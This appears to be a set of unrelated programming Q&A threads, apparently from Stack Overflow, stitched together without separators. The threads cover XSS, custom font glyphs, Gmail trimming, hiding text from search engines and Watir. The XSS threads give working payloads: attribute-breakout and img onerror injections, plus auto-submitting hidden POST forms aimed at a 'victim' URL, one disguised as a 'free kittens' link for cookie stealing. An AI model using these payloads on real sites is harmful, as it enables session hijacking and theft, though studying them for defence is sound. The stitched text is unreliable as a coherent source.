I recently started teaching myself about XSS vulnerabilities and stumbled upon this website for practice:
https://sudo.co.il/xss/level2.php
But after several attempts with payloads such as
<script>alert('XSS')</script>
I can't get the XSS to work.
The value is reflected in the input's value attribute. You can escape it by starting with a " and then adding other attributes. For example: " onmouseover="alert('XSS')".
To require less user interaction you can also change the style: " onmouseover="alert('XSS')" style="width: 1000px; height: 1000px", though there may be better attributes to use instead.
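A rough sketch of what the reflected markup ends up looking like; the field name and the template shape are assumptions, not taken from the actual challenge page:
<!-- Assumed template:  <input type="text" name="q" value="PAYLOAD"> -->
<!-- Payload submitted: " onmouseover="alert('XSS')" style="width: 1000px; height: 1000px -->
<input type="text" name="q"
       value="" onmouseover="alert('XSS')" style="width: 1000px; height: 1000px">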
Alternatively, you can escape it by starting with a " and breaking out of the tag entirely.
For example: "><img/src=x onerror=alert(origin)>
This character doesn't exist in Unicode since I created it myself. Right now it is in an EPS file, and from what I've found I can't simply add it to Unicode.
My goal is to display it and let my viewers see whether they like it, but not in any picture format, since the character also serves other purposes on the website where displaying it as an image is simply not an option.
How can I display a self-created character so that it behaves only like a regular letter?
Yes we can, but we should be really careful doing so.
As Remy Lebeau suggested, if you really insist on using a custom glyph as a "regular letter" inside the text flow, you should:
create a real font file to be placed on the web (WOFF/OTF) or installed on each user device (OTF/TTF),
ensure that the custom glyph in your font file is assigned to a code point from the Private Use Area,
use that code point in the unicode-range value of @font-face,
and add the newly created font-family to the font stack.
Example:
@font-face {
  font-family: f;
  src: local(Impact), local(Haettenschweiler), local("Helvetica Inserat");
  unicode-range: U+65;
}
@font-face {
  font-family: f;
  src: local("Courier New"), local(Menlo), local("Liberation Mono");
  unicode-range: U+6f;
}
body { font-family: f, sans-serif; }
<p>Some text where the letters "o" and "e" come from different ("custom") font faces.</p>
A font face containing only private-use characters should work even as the last (fallback) entry in the stack, but that does not matter here. In your case those local() declarations would be replaced with a url() path or a data URI. If your target audience is in a controlled environment (an intranet) and you can reliably distribute the font to all consuming devices, you can even use local([name of locally installed custom font]).
The unicode-range value would be something like U+F8FF.
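As a minimal sketch of that variant (the family name and the file custom-glyph.woff2 are placeholders, not from the original answer):
<style>
@font-face {
  font-family: custom-glyph; /* placeholder family name */
  src: url("/fonts/custom-glyph.woff2") format("woff2"); /* hypothetical font file */
  unicode-range: U+F8FF; /* only this private-use code point comes from the custom font */
}
body { font-family: custom-glyph, sans-serif; }
</style>
<p>Here is the custom letter: &#xF8FF;</p>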
But use this if, and only if, you are sure your users will actually get the font.
Why you probably should not do it this way
If there is a chance that (some of) your users have not installed, do not support, cannot download, or are blocking the given font, or are using assistive technology to consume your content while the glyph conveys meaningful information, you should probably refrain from the approach described above.
If you don't have such a controlled audience and want to support screen readers, and still don't want to use a simple <img alt="[glyph meaning in the context]">, you should at least wrap each occurrence as suggested in Léonie Watson's article Accessible emoji:
Some text <span role="img" aria-label="[glyph meaning in the context]"></span>
Gmail introduced a trimming feature in emails for "better readability". This causes a lot of pain for me, because I have an email notification system that sends HTML messages to users. Basically the email looks like this:
<div> (wrapper divs and styling)
  Object alert in Project by User
  <table> <tr> <td>
    User Action on Object in Project
  </td> </tr> </table>
</div>
link
footer
To group all emails into one conversation, the first email has the subject and subsequent emails have Re: subject.
Active users can receive a significant number of emails like this, but because of the "better readability" feature, ALL of the email content (starting from the second email) is suppressed.
I am looking for advice: maybe I should redesign my HTML, maybe Gmail has some anti-suppression markup, or maybe there is simply a hack to work around this issue.
The issue from the users' perspective is described here: http://www.google.com/support/forum/p/gmail/thread?tid=756b83fa60ca1df7&hl=en
I had the trimming problem occurring on a table in an HTML newsletter. It was very important that the entire table display, because it was the #1 content our client wanted to communicate. Here's the fix, or at least here's how we solved our problem: we eliminated any repetition. For this table, Gmail was seeing the lines between each row as repetitive, so I altered the pixel width by 1 px on every other line, which eliminated the repetition and fixed our problem. That said, look for repetition and try to remove it, or in some cases you might have to add type (in white) to create the variation.
Source.
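A rough sketch of that 1 px variation; the widths (600/599) are made-up values, not taken from the original newsletter:
<table cellpadding="0" cellspacing="0">
  <!-- alternating the width by 1 px so consecutive rows are not byte-for-byte identical -->
  <tr><td width="600">Row one content</td></tr>
  <tr><td width="599">Row two content</td></tr>
  <tr><td width="600">Row three content</td></tr>
</table>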
PS: This is a bit unrelated, but I stumbled upon this question while looking for a way to disable the content trimming and keep the conversation view at the same time. I didn't find anything, so I developed a small extension for Chrome and Firefox.
It turns out that there is a very simple rule which causes this behaviour: Gmail will clip the email as soon as it sees the sender (From:) name in the body of the message, regardless of where this appears.
Solution: make sure that the From: name in your email is not used in the message body (except in the signature, which will probably get clipped anyway!).
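For illustration, assuming the sender name were "Project Notifier" (a made-up name), the body would need to avoid repeating that exact string:
<!-- From: "Project Notifier" <noreply@example.com>  (hypothetical sender) -->
<!-- Risky: the literal sender name in the body can trigger clipping -->
<p>Project Notifier: User commented on Object.</p>
<!-- Safer: same information without the From: name -->
<p>User commented on Object in Project.</p>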
This is an awful bug in Gmail, if you're unlucky enough to get bitten by it.
In my case, it was "trimming" an entire message, in a clean thread. See an example here, noting that the "trimmed" content is expanded in the screen-shot.
I ultimately worked around Gmail's bug by removing the entire header you see in that example ("Awesome Home Swap"), including the border below it. I stopped short of actually figuring out what specifically was making Gmail mistake that header for a "signature" (though I suspect it could have been the border, implemented by styling the <td> element with border-bottom: 1px dotted grey).
I just found a solution that worked wonderfully for me: simply scatter a bunch of hidden, unique images throughout your emails to add uniqueness to parts that aren't actually unique. I'm building my emails with React, so I have this Unique component that I use pretty much everywhere:
import * as React from "react"

// Throwaway random digits used as a fake base64 payload; the only goal is to
// make each rendered <img> tag unique so Gmail stops seeing repeated content.
function random() {
  return Math.round(Math.random() * 10000000).toString()
}

class Unique extends React.PureComponent {
  render() {
    // The src is deliberately junk data that never renders; alt="" keeps the
    // broken image out of screen readers.
    return (
      <img style={Unique.style} src={`data:image/png;base64,${random()}`} alt="" />
    )
  }

  // Inline styles that keep the placeholder image invisible in email clients.
  static style = {
    visibility: "hidden",
    display: "none",
    width: 0,
    height: 0,
    color: "transparent",
    background: "transparent",
  }
}
One thing I like about this solution is that it doesn't mess up the email preview text that would otherwise happen if you're using hidden text.
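For reference, each <Unique /> instance renders to something like the following in the final email HTML; the base64 value shown here is only an illustration of the random junk payload:
<img alt="" src="data:image/png;base64,4821736"
     style="visibility:hidden;display:none;width:0;height:0;color:transparent;background:transparent">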
Add a double hyphen -- before the collapsed part. I was able to wrap it in an element whose font color matched the background. Worked for me.
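A sketch of that trick; the #ffffff colour is an assumption and should match your own template's background:
<span style="color:#ffffff;">--</span>
<!-- repeated notification block follows -->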
I looked at the emails Gmail itself sends. It adds the following code (a spacer .gif); I guess this is the solution:
<img alt="" height="1" width="3" src="https://notifications.google.com/g/img/AD-FnEztup4OClDshQhMVXDbi6Oi0lSN-FgEY1jyW384aotccA.gif">
</td>
</tr>
</table>
</body>
</html>
In my WordPress blog, I have "Posted ? days ago" on every post, and I have 10 posts on my homepage. So according to most keyword analysis tools, "days ago" is a top keyword on my blog, but I don't want it to be. How can I hide those words from search engines?
I don't want to use JavaScript. I could easily use PHP and the $_SERVER variable, but I'm afraid I might get penalized for cloaking. Is there an HTML tag or attribute, like rel="nofollow", that I can use?
From "Is there any way to have search engines not index a certain section of a page?":
Supposedly you can add the class robots-nocontent to elements on your page, like this:
<div class="robots-nocontent">
<p>Ignore this stuff.</p>
</div>
Yahoo respects this, though I don't know if other search engines respect it. It appears Google is not supporting this at this time.
I suspect that if you load your content via AJAX you would get the same effect of it not being present on the page.
and
There's no general way to do that and personally I wouldn't bother with it. Search engines are pretty good at recognizing relevant content on a page, and even though that content might show up in the keywords that search engines have found, it doesn't mean that it would make the page relevant for those keywords.
If you have a page about "Fish" and a page about "Dogs" (that has the link to the page about "Fish" somewhere in the sidebar), search engines will generally be able to recognize that the page about "Fish" is much more relevant for "Fish" than the page about "Dogs" that mentions "Fish" in the sidebar. It's possible that both pages might be found at some point, but given that mostly one page from the site is shown in the search results, that's not something worth worrying about.
There's no need to be fancy with that, and search engines are likely to just get more confused if you try (e.g. if you use JavaScript to hide the content, you never know when search engines will start to find that content regardless). Similarly, using iframes with robots.txt disallows or AJAX will frequently degrade the quality of your pages for users (slow them down or make them less usable on a variety of devices), so unless there is a very, very strong and proven reason that you need to do this, I would strongly recommend not bothering with it.
What I found on the wiki:
For Yandex:
<!--noindex-->Don't index this text.<!--/noindex-->
For Yahoo:
<div class="robots-nocontent">Don't index this text.</div>
For Google:
<!--googleoff: index--> Don't index this text.<!--googleon: index-->
Linksku, I'm fairly sure you shouldn't be worried about that particular piece of text. Our algorithms do a relatively good job detecting boilerplate text. As far as I can tell from your question, this text is boilerplate and we likely already know that.
As for detecting Googlebot and not serving this text to it: you're right, that would be cloaking and you should never do it. In this case, if you hide that text from us, we will also have a hard time detecting that it's boilerplate, and you would end up doing exactly what you're trying to avoid :)
I worked this out and posted it up at: http://www.scivillage.com/thread-2580.html
This should work, however more testing of it and feedback would be appreciated.
.x:before{
content:attr(title);
display:inline;
}
<ul>
<li><span class="x" title="Homepage"></span></li>
<li><span class="x" title="Contact" /></li>
</ul>
(I kept the class name short to reduce mark-up creep)
Search engines should ignore HTML tags with empty values when it comes to looking for keywords, which should mean they ignore what is written in the title attribute. (The assumption is that the element's content is what matters; if it is empty, there is no point checking the attributes.)
It was suggested that it's possible to omit the closing tag in HTML5 due to its reduced strictness, but there are counter-suggestions that end tags are still required.
I'd suggest not using this directly on <a> (anchor) tags, since they can be used for sitemaps (using #), which means the title would likely be spidered anyway.
It is possible that a search engine might assume any such title content is there to inflate keywords through hidden elements, but I cannot confirm this.
To exclude specific text from Google search results you can add the data-nosnippet attribute.
https://developers.google.com/search/reference/robots_meta_tag#data-nosnippet-attr
From the Google documentation:
You can also prevent certain parts of the page text content from being shown in a snippet by using data-nosnippet.
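Applied to the "days ago" text from the question, a minimal example would look like this (note that the text can still be crawled; it is only kept out of the result snippet):
<p>My blog post title</p>
<p><span data-nosnippet>Posted 3 days ago</span></p>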
HTML:
<div class="hasHiddenText">_</div>
It is important that you leave a non-whitespace character inside the element that carries the hidden text.
External CSS:
.hasHiddenText{
content: "Your hidden text here...";
/* This overwrites the default content of the div, but it isn't supported by all browsers. */
}
.hasHiddenText::before{
content: " Your hidden text here...";
/*Places a hidden text above the div.*/
}
The "hidden text" pertains to content hidden to all search engines but visible to visitors.
You can also use nextline and all sorts of Unicode characters by escaping them with \uXXXX. To display linebreak characters correctly, be sure to add the
white-space:pre-line;
property.
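A small sketch combining both; the text is a placeholder, \A is the CSS escape for a line feed and \00A9 for the copyright sign:
.hasHiddenText::before{
  content: "First hidden line\A Second hidden line \00A9";
  white-space: pre-line; /* renders the escaped \A as a real line break */
}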
Examine this example. It's in PHP, but you should be able to follow what is happening even if you don't know PHP.
echo 'You searched for "' . $_GET['q'] . '"';
Now, obviously, this is a bad idea, if I request...
http://www.example.com/?q=<script type="text/javascript">alert('xss');</script>
OK, now I change that GET to a POST...
echo 'You searched for "' . $_POST['q'] . '"';
Now the query string in the URL won't work.
I know I can't use AJAX to post there, because of same domain policy. If I can run JavaScript on the domain, then it already has security problems.
One thing I thought of is coming across a site that is vulnerable to XSS, and adding a form which posts to the target site that submits on load (or, of course, redirecting people to your website which does this). This seems to get into CSRF territory.
So, what are the ways of exploiting the second example (using POST)?
Thanks
Here is an XSS exploit for your vulnerable code. As you have alluded to, this is an identical attack pattern to POST-based CSRF. In this case I am building the POST request as a form, and then I call .submit() on the form at the very bottom. In order to call submit, there must be a submit-type input in the form. The POST request will execute immediately and the page will redirect, so it is best to run POST-based CSRF exploits in an invisible iframe.
<html>
  <form id="xssform" method="post" action="http://victim/vuln.php">
    <input type="hidden" name="q" value="<script>alert(/xss/)</script>">
    <input type="submit">
  </form>
  <script>
    // Auto-submit so the POST fires as soon as the page loads.
    document.getElementById("xssform").submit();
  </script>
</html>
I also recommend reading about the Samy worm, and feel free to ask any questions about other exploits I have written.
All I would need to do to exploit this is get a user to submit a form that sends a tainted "q" POST variable. If I were being all nasty-like, I would craft a form button that looks like a link (or even a link that gets rewritten into a form POST with JavaScript, sort of like how Rails did its link_to_remote stuff pre-3.0).
Imagine something like this:
<form id="nastyform" method="post" action="http://yoururl.com/search.php">
<input type="submit" value="Click here for free kittens!">
<input type="hidden" name="q" value="<script>alert('My nasty cookie-stealing Javascript')</script>" />
</form>
<style>
#nastyform input {
border: 0;
background: #fff;
color: #00f;
padding: 0;
margin: 0;
cursor: pointer;
text-decoration: underline;
}
</style>
If I can get a user to click that (thinking he's clicking some innocent link), then I can post arbitrary data to the search, which then gets echoed into his page, and I can hijack his session or do whatever other nasty things I want.
POST data isn't inherently more secure than GET data; it's still user input and absolutely cannot be trusted.
CSRF attacks are a different class of attack, where some legitimate action is initiated without the permission of the user. This has the same sort of entry vector, but it's a classic XSS attack, designed to inject malicious JavaScript into the page for the purpose of gaining session access or something similarly damaging.
Given the following HTML code (which, I realise, sucks, but that's not something I can currently solve):
<img height="64" width="64" class='list_item' src="/img/icon/first.jpg"
title="This is the first item::Completed the item "I did this first"" alt="First" />
gives me this result (this is image.to_s):
name:
type:
id:
value:
disabled:
src: /img/icon/first.jpg
width: 64
height: 64
alt: First
Note the lack of a "title" attribute. This does not actually change (the title is always missing).
If I get the contents of the parent div of one of those icons, I get something like:
<img class="list_item" I="" did="" this="" first="" src="/img/icon/first.jpg" alt="First">
The broken HTML of the original has been turned into separate attributes somewhere down the line, but the title tag appears to have been stripped completely, and since it's the contents of the title tag I need, I'm a little stuck.
This has been tried with the latest Watir on Ruby 1.9.2 using Firefox.
Perfect world solution: I'd like to get the original transmitted HTML for the image tag, so I can "special case" (i.e., hack) around the stupid double-quote problem.
Good Enough Solution: the contents of the title tag.
There is actually a #title method on Watir::Image. With the above incorrect HTML the output would be like this (where 'i' is the Image object):
i.title
=> "This is the first item::Completed the item "
This shows only part of the title.
But you could use #html and then parse all the necessary information out of it with some magic:
i.html
=> "<IMG class=list_item title=\"This is the first item::Completed the item \" alt=First src=\"/img/icon/first.jpg\" width=64 height=64 first?? this did I>"
But as other answers above have mentioned - you cannot get it out correctly due to the bad HTML. Maybe there's some other way to accomplish your bigger goal you're having?
Getting the title probably isn't working because the way the title attribute is set on that element isn't valid. The characters ", <, and > need to be escaped inside HTML attributes, with &quot;, &lt;, and &gt; respectively. Escape the quotes and try again.
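In other words, the markup from the question would need the inner quotes encoded, for example:
<img height="64" width="64" class="list_item" src="/img/icon/first.jpg"
     title="This is the first item::Completed the item &quot;I did this first&quot;" alt="First" />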
Not sure, but I don't think Watir supports image titles. I looked over the Supported Elements page; title was x'ed out. I don't see it in the RDoc for the Watir::Image type either.